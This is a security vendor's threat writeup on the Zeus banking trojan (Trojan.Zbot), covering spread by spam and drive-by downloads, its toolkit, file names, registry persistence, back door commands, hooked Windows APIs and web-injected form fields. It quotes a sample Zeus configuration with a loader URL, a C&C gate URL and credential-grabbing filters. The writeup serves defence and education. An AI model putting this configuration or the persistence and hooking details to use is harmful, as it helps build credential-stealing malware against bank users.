1. /
  2. Security Response/
  3. Trojan.Zbot

Trojan.Zbot

Risk Level 2: Low

Discovered:
January 10, 2010
Updated:
July 15, 2014 2:32:24 PM
Also Known As:
Trojan-Spy:W32/Zbot [F-Secure], PWS-Zbot [McAfee], Trojan-Spy.Win32.Zbot [Kaspersky], Win32/Zbot [Microsoft], Infostealer.Monstres [Symantec], Infostealer.Banker.C [Symantec], Trojan.Wsnpoem [Symantec], Troj/Zbot-LG [Sophos], Troj/Agent-MDL [Sophos], Troj/Zbot-LM [Sophos], Troj/TDSS-BY [Sophos], Troj/Zbot-LO [Sophos], Troj/Buzus-CE [Sophos], Sinowal.WUR [Panda Software], Troj/QakBot-D [Sophos], Troj/Agent-MIR [Sophos], Troj/Qakbot-E [Sophos], Troj/QakBot-G [Sophos], Troj/QakBot-F [Sophos], Troj/Agent-MJS [Sophos], Troj/Agent-MKP [Sophos], Troj/Zbot-ME [Sophos], Troj/Dloadr-CYP [Sophos], Win32/Zbot.WY [Computer Associates], Troj/DwnLdr-IBQ [Sophos], Troj/Zbot-NG [Sophos], W32/Zbot-NI [Sophos], Troj/Zbot-NN [Sophos], Troj/DwnLdr-ICV [Sophos], Troj/DwnLdr-ICY [Sophos], Troj/DwnLdr-IDB [Sophos], Troj/Dldr-DM [Sophos], Troj/Zbot-NR [Sophos], Troj/Zbot-NS [Sophos], Troj/Agent-MWK [Sophos], Troj/FakeAV-BDB [Sophos], Troj/Agent-MYL [Sophos], Troj/Agent-NAX [Sophos], Troj/Zbot-OD [Sophos], Troj/Zbot-OE [Sophos], Troj/Zbot-OT [Sophos], Troj/FakeAV-BGJ [Sophos], Troj/VB-EPV [Sophos], Troj/VB-EQA [Sophos], Troj/Zbot-PE [Sophos], Troj/Zbot-OZ [Sophos], Troj/Zbot-PA [Sophos], Troj/Zbot-OY [Sophos], Troj/FakeAV-BHP [Sophos], Troj/Zbot-OX [Sophos], Troj/Agent-NIV [Sophos], Troj/Zbot-PM [Sophos], Troj/Zbot-PQ [Sophos], Troj/Agent-NKD [Sophos], Troj/Zbot-PP [Sophos], Troj/Zbot-PN [Sophos], Troj/Zbot-PX [Sophos], Troj/Zbot-PW [Sophos], Troj/Zbot-PY [Sophos], Troj/Zbot-PT [Sophos], Troj/Zbot-PV [Sophos], Troj/Zbot-QC [Sophos], Troj/Zbot-QD [Sophos], Troj/Zbot-QK [Sophos], Troj/Zbot-QZ [Sophos], Troj/VB-ERY [Sophos], Troj/Zbot-RA [Sophos], Troj/Zbot-RK [Sophos], Troj/Dloadr-DAD [Sophos], Troj/Zbot-RP [Sophos], Troj/Zbot-RY [Sophos], Troj/Zbot-SC [Sophos], Troj/Zbot-SD [Sophos], Troj/Zbot-SB [Sophos], Troj/Zbot-SF [Sophos], Troj/Zbot-SV [Sophos], Troj/Agent-NUO [Sophos], Troj/Zbot-SP [Sophos], Troj/Meredrop-K [Sophos], Troj/Zbot-SX [Sophos], Troj/Zbot-SY [Sophos], Troj/Zbot-SR [Sophos], Troj/Zbot-TG [Sophos], Troj/Zbot-TQ [Sophos], Troj/Zbot-TY [Sophos], Troj/ZBot-UL [Sophos], Troj/Zbot-VN [Sophos], Troj/Zbot-VM [Sophos], Troj/Zbot-VQ [Sophos], Troj/Zbot-WD [Sophos], Troj/Zbot-WF [Sophos], Troj/Zbot-XA [Sophos], Troj/Agent-OLW [Sophos], Troj/Zbot-XO [Sophos], Troj/Zbot-XN [Sophos], Troj/Zbot-YB [Sophos], Troj/Zbot-YE [Sophos], Troj/Zbot-YO [Sophos], Troj/Zbot-YP [Sophos], Troj/ZBot-ZJ [Sophos], Troj/Zbot-AAN [Sophos], Troj/Zbot-AAM [Sophos], Troj/Zbot-ACI [Sophos], Troj/Zbot-AGC [Sophos], Troj/Zbot-AGJ [Sophos], Troj/Zbot-AHE [Sophos], Troj/Zbot-AHD [Sophos], Troj/Zbot-AIR [Sophos]
Type:
Trojan
Systems Affected:
Windows 2000, Windows 7, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows Server 2008, Windows Vista, Windows XP
1. Prevention and avoidance
1.1 User behavior and precautions
1.2 Patch operating system and software
2. Infection method
2.1 Spam emails
2.2 Drive-by downloads
3. Functionality
3.1 Toolkit
3.2 System modifications
3.3 Command and control server
3.4 Information gathering
3.5 Password stealing
4. Additional information



1. PREVENTION AND AVOIDANCE

The following actions can be taken to avoid or minimize the risk from this threat.


1.1 User behavior and precautions

Trojan.Zbot relies heavily on social engineering in order to infect computers. The spam email campaigns used by attackers attempt to trick the user by referencing the latest news stories, playing upon fears their sensitive information has been stolen, suggesting that compromising photos have been taken of them, or any number of other ruses.

Users should use caution when clicking links in such emails. Basic checks such as hovering with the mouse pointer over each link will normally show where the link leads to. Users can also check online Web site rating services such as safeweb.norton.com to see if the site is deemed safe to visit.


1.2 Patch operating system and software
The attackers behind this threat have been known to utilize exploit packs in order to craft Web pages to exploit vulnerable computers and infect them with Trojan.Zbot.

As of February 24, 2010, Trojan.Zbot has been seen using the following vulnerabilities:

Users are advised to ensure that their operating systems and any installed software are fully patched, and that antivirus and firewall software is up to date and operational. Users should turn on automatic updates if available, so that their computers can receive the latest patches and updates when they are made available.



2. INFECTION METHOD
This threat is known to infect computers through a number of methods. We will examine each of these methods in more detail.


2.1 Spam emails
The attackers behind Trojan.Zbot have made a concerted effort to spread their threat using spam campaigns. The subject material varies from one campaign to the next, but often focuses on current events or attempt to trick the user with emails purported to come from well-known institutions such as FDIC, IRS, MySpace, Facebook, or Microsoft.







2.2 Drive-by downloads

The authors behind Trojan.Zbot have also been witnessed using exploit packs to spread the threat via drive-by download attacks. When an unsuspecting user visits one of these Web sites, a vulnerable computer will become infected with the threat.

The particular exploits used to spread the threat vary, largely depending on the proliferation and ease-of-use of exploits available in the wild at the time the Trojan is distributed.

As of February 24, 2010, Trojan.Zbot has been seen using the following vulnerabilities:



3. FUNCTIONALITY
The Zeus threat is actually comprised of three parts: a toolkit, the actual Trojan, and the command & control (C&C) server. The toolkit is used to create the threat, the Trojan modifies the compromised computer, and the C&C server is used to monitor and control the Trojan.

This video describes these aspects of Zeus:
Zeus: King of crimeware toolkits


3.1 Toolkit
Trojan.Zbot is created using a toolkit that is readily available on underground marketplaces used by online criminals. There are different versions available, from free ones (often back doored themselves) to those an attacker must pay up to $700 USD for in order to use. These marketplaces also offer other Zeus-related services, from bulletproof hosting for C&C servers, to rental of already-established botnets.



Regardless of the version, the toolkit is used for two things. First, the attacker can edit and then compile the configuration file into a .bin file. Secondly they can compile an executable, which is then sent to the potential victim through various means. This executable is what is commonly known as the Zeus Trojan or Trojan.Zbot.




The ease of use of the toolkit user interface makes it very easy and quick for nontechnical, would- be criminals to get a piece of the action. Coupling this with the multitude of illicit copies of the toolkit circulating in the black market ensures that Trojan.Zbot continues to be one of the most popular and widely seen Trojans on the threat landscape.


3.2 System modifications
While unusual in today’s threat landscape, Trojan.Zbot tends to use many of the same file names across variants. Given the way that the toolkit works, each revision tends to stick to the same file names when the executables are created. While the initial executable can be named whatever the attacker wants it to be, the files mentioned in the following subsections refer to the names used by the currently known toolkits.


User account privileges
The location that Trojan.Zbot installs itself to is directly tied to the level of privileges the logged-in user account has at the time of infection. If the user is an administrator, the files are placed in the %System% folder. If not, they are copied to %UserProfile%\Application Data.


Trojan executable
Trojan.Zbot generally creates a copy of itself using one of the following file names:
  • ntos.exe
  • oembios.exe
  • twext.exe
  • sdra64.exe
  • pdfupd.exe


Configuration file
The threat creates a folder named “lowsec” in either the %System% or %UserProfile%\Application Data folder and then drops one of the following files into it:
  • video.dll
  • sysproc32.sys
  • user.ds
  • ldx.exe

While the extensions vary here, these are all text-file versions of the configuration file previously created and then compiled into the Trojan using the Zeus toolkit. This file contains any Web pages to monitor, as well as a list of Web sites to block, such as those that belong to security companies. It can also be updated by the attacker using the threat’s back door capabilities.

Here is a portion of a sample configuration file:

Entry “DynamicConfig”
url_loader “http://[REMOVED].com/zeusbot/ZuesBotTrojan.exe”
url_server “http://[REMOVED].com/zeusbot/gate.php”
file_webinjects “webinjects.txt”
entry “AdvancedConfigs”
;
end
entry “WebFilters”
“!http://[REMOVED].com”
“https:// [REMOVED].com/*”
“!http://[REMOVED].ru/*”
end
entry “WebDataFilters”
; “!http://[REMOVED].ru/*” “passw;login”
end
entry “WebFakes”
; “http://[REMOVED].com” “http://[REMOVED].com” “GP” “” “”
end
entry “TANGrabber”
“https://[REMOVED].com/*/jba/mp#/SubmitRecap.do” “S3C6R2” “SYNC_TOKEN=*” “*”
end
entry “DnsMap”
;127.0.0.1
end
end


Stolen data file

A second file is dropped into the “lowsec” folder, with one of the following file names:
  • audio.dll
  • sysproc86.sys
  • local.ds

This file serves as a storage text file for any the stolen information. When a password is obtained by the threat, it is saved in this file and later sent to the attacker.


Registry subkeys and entries created
In addition, the threat adds itself to the registry to start when Windows starts, using one of two subkeys:

  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\"Userinit" = "%System%\userinit.exe, %System%\sdra64.exe"
  • HKEY_CURRENT_USER\ SOFTWARE \Microsoft\Windows\CurrentVersion\Run\”userinit” = “%UserProfile%\Application Data\sdra64.exe”

If the logged-in account at the time of infection has administrative privileges, the first entry is created. If the account has limited privileges, the second is used.


Service injection
Depending on the level of privileges, Trojan.Zbot will inject itself into one of two services. If the account has administrative privileges, the threat injects itself into the winlogon.exe service. If not, it attempts to do the same with the explorer.exe service.

The threat also injects code into an svchost.exe service, which it later uses when stealing banking information.


3.3 Command and control server
When Trojan.Zbot is installed, it reports back to the C&C server that is referenced in the configuration file when the executable was created using the toolkit. The first thing it checks for is an updated version of its configuration file.


Back door
The back door to the C&C server provides the attacker with a versatile set of options for how he or she can use the compromised computer. For example, attackers can perform any of the following actions, if they so wish:
  • Restart or shut down the computer
  • Delete system files, rendering the computer unusable
  • Disable or restore access to a particular URL
  • Inject rogue HTML content into pages that match a defined URL
  • Download and execute a file
  • Execute a local file
  • Add or remove a file mask for local search (e.g. hide the threat’s files)
  • Upload a file or folder
  • Steal digital certificates
  • Update the configuration file
  • Rename the bot executable
  • Upload or delete Flash cookies
  • Change the Internet Explorer start page

The domains that the back door connects to vary, depending on what the attacker has included in the configuration file.


Server-side control panel
The C&C server not only allows the attacker to perform a number of functions on a compromised computer, but also gives them the ability to manage a botnet of Zeus-infected computers. An attacker can monitor statistics on the number of infected computers he or she controls, as well as generate reports on the stolen information the bots have gathered.








3.4 Information gathering
Once installed Trojan.Zbot will automatically gather a variety of information about the compromised computer, which it sends back to the C&C server. This information includes the following:
  • A unique bot identification string
  • Name of the botnet
  • Version of the bot
  • Operating system version
  • Operating system language
  • Local time of the compromised computer
  • Uptime of the bot
  • Last report time
  • Country of the compromised computer
  • IP address of the compromised computer
  • Process names


3.5 Password stealing
The core purpose of Trojan.Zbot is to steal passwords, which is evident by the different methods it goes about doing this.

Upon installation, Trojan.Zbot will immediately check Protected Storage (PStore) for passwords. It specifically targets passwords used in Internet Explorer, along with those for FTP and POP3 accounts. It also deletes any cookies stored in Internet Explorer. That way, the user must log in again to any commonly visited Web sites, and the threat can record the login credentials at the time.

A more versatile method of password-stealing used by the threat is driven by the configuration file during Web browsing. When the attacker generates the configuration file, he or she can include any URLs they wish to monitor. When any of these URLs are visited, the threat gathers any user names and passwords typed into these pages. In order to do this, it hooks the functions of various DLLs, taking control of network functionality. The following is a list of DLLs and the APIs within them that are used by Trojan.Zbot:

WININET.DLL
  • HttpSendRequestW
  • HttpSendRequestA
  • HttpSendRequestExW
  • HttpSendRequestExA
  • InternetReadFile
  • InternetReadFileExW
  • InternetReadFileExA
  • InternetQueryDataAvailable
  • InternetCloseHandle

WS2_32.DLL and WSOCK32.DLL
  • send
  • sendto
  • closesocket
  • WSASend
  • WSASendTo

USER32.DLL
  • GetMessageW
  • GetMessageA
  • PeekMessageW
  • PeekMessageA
  • GetClipboardData

Trojan.Zbot can also inject other fields into the Web pages it monitors. To do this, it intercepts the pages as they are returned to the compromised computer and adds extra fields. For example, if a user requests a page from their bank’s Web site, and the bank returns a page requiring a user name and password, the threat can be configured to inject a third field asking for the user’s Social Security Number.







4. ADDITIONAL INFORMATION
For more information relating to this threat family, please see the following resources:

Recommendations

Symantec Security Response encourages all users and administrators to adhere to the following basic security "best practices":

  • Use a firewall to block all incoming connections from the Internet to services that should not be publicly available. By default, you should deny all incoming connections and only allow services you explicitly want to offer to the outside world.
  • Enforce a password policy. Complex passwords make it difficult to crack password files on compromised computers. This helps to prevent or limit damage when a computer is compromised.
  • Ensure that programs and users of the computer use the lowest level of privileges necessary to complete a task. When prompted for a root or UAC password, ensure that the program asking for administration-level access is a legitimate application.
  • Disable AutoPlay to prevent the automatic launching of executable files on network and removable drives, and disconnect the drives when not required. If write access is not required, enable read-only mode if the option is available.
  • Turn off file sharing if not needed. If file sharing is required, use ACLs and password protection to limit access. Disable anonymous access to shared folders. Grant access only to user accounts with strong passwords to folders that must be shared.
  • Turn off and remove unnecessary services. By default, many operating systems install auxiliary services that are not critical. These services are avenues of attack. If they are removed, threats have less avenues of attack.
  • If a threat exploits one or more network services, disable, or block access to, those services until a patch is applied.
  • Always keep your patch levels up-to-date, especially on computers that host public services and are accessible through the firewall, such as HTTP, FTP, mail, and DNS services.
  • Configure your email server to block or remove email that contains file attachments that are commonly used to spread threats, such as .vbs, .bat, .exe, .pif and .scr files.
  • Isolate compromised computers quickly to prevent threats from spreading further. Perform a forensic analysis and restore the computers using trusted media.
  • Train employees not to open attachments unless they are expecting them. Also, do not execute software that is downloaded from the Internet unless it has been scanned for viruses. Simply visiting a compromised Web site can cause infection if certain browser vulnerabilities are not patched.
  • If Bluetooth is not required for mobile devices, it should be turned off. If you require its use, ensure that the device's visibility is set to "Hidden" so that it cannot be scanned by other Bluetooth devices. If device pairing must be used, ensure that all devices are set to "Unauthorized", requiring authorization for each connection request. Do not accept applications that are unsigned or sent from unknown sources.
  • For further information on the terms used in this document, please refer to the Security Response glossary.
Writeup By: Ben Nahorney and Nicolas Falliere
Summary| Technical Details| Removal

Search Threats

Search by name
Example: W32.Beagle.AG@mm
STAR Antimalware Protection Technologies
Internet Security Threat Report
Symantec DeepSight Screensaver